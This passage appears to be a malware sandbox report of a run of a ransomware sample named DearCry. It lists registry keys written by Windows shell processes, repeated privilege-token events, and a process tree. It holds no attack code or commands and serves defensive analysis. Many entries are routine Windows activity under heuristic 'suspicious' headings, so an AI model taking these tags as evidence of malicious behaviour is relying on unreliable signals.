| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3642458265-1901903390-453309326-1000\{01F335E3-116A-44B8-9A60-FB114F4828FF} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3642458265-1901903390-453309326-1000\{7DFF2A75-63E2-405F-8B9E-F885FB935DF0} | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3642458265-1901903390-453309326-1000\{A5B63874-4B71-4074-841A-5A07F07E9565} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
